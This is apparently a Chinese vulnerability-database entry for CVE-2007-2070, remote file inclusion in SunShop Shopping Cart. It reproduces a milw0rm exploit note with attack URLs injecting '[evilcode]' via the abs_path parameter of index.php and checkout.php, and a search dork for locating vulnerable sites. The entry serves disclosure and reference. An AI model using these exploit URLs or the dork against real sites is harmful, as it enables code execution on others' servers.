Turnkey Web Tools SunShop Shopping Cart 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112725 漏洞类型 代码注入
发布时间 2007-04-16 更新时间 2007-08-02
CVE编号 CVE-2007-2070 CNNVD-ID CNNVD-200704-306
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3748
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-306
|漏洞详情
TurnkeyWebToolsSunShopShoppingCart存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)index.php或(2)checkout.php的abs_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]

# milw0rm.com [2007-04-16]
|参考资料

来源:XF
名称:sunshop-index-checkout-file-include(33670)
链接:http://xforce.iss.net/xforce/xfdb/33670
来源:BID
名称:23511
链接:http://www.securityfocus.com/bid/23511
来源:MILW0RM
名称:3748
链接:http://www.milw0rm.com/exploits/3748
来源:VUPEN
名称:ADV-2007-1422
链接:http://www.frsirt.com/english/advisories/2007/1422
来源:OSVDB
名称:37415
链接:http://osvdb.org/37415
来源:OSVDB
名称:37414
链接:http://osvdb.org/37414